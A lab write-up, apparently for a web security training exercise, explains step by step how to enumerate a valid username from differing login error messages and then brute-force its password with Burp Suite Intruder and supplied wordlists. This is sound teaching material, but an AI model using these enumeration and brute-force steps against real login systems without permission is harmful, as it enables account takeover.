Lab: Username enumeration via different responses
When starting the lab go to the login page and enter any username and password to test the Login page. In this case, I entered Username:user and Password:password.
Next, we use Burp Suite to intercept the web traffic by setting up a web proxy. We have to send this intercept to the intruder for us to prepare our attack.
Here in the positions tab, we set the attack type to sniper where we only attack one parameter. We need to click the clear button on the right, to clear any default highlights made by burp suite. Now highlight the parameter we want to attack, which in this case is the username. After highlighting, click on the add button to select the parameter for the attack.
Next under Intruder go to payloads and in the payload options click the load button to select the username list (for this lab the username and password list are given).
Once done go back to the positions tab and select attack.
Once the attack is done, look through the list and you will find a username, “ao” with a status of “302” that is different from the rest. This indicates that this might be a potential username.
Let’s return to the login page and try to login in with ao:<somePassword>.
Here we see that instead of the error notification of “Invalid username”, this time the notification is “Incorrect password”. With this, we know that the username we just used, is the correct one. Next, we can just focus on doing a brute force attack on the password parameter.
Let’s again intercept the post request from the login page, and send it to the intruder using sniper mode.
Next, the parameter we want to attack is the password.
Same as before we have to load up our payload, but this time using the password list. Once that is loaded up, let’s start the attack.
Here we can see the password has a status of 302 which is different from the rest. In this case, we know that that would be the password of the user: ao.
Using the credential [ao:password] we are able to successfully log in and go to the “My account” page to solve this lab.
Do take note that the username and password changes for every new lab session.
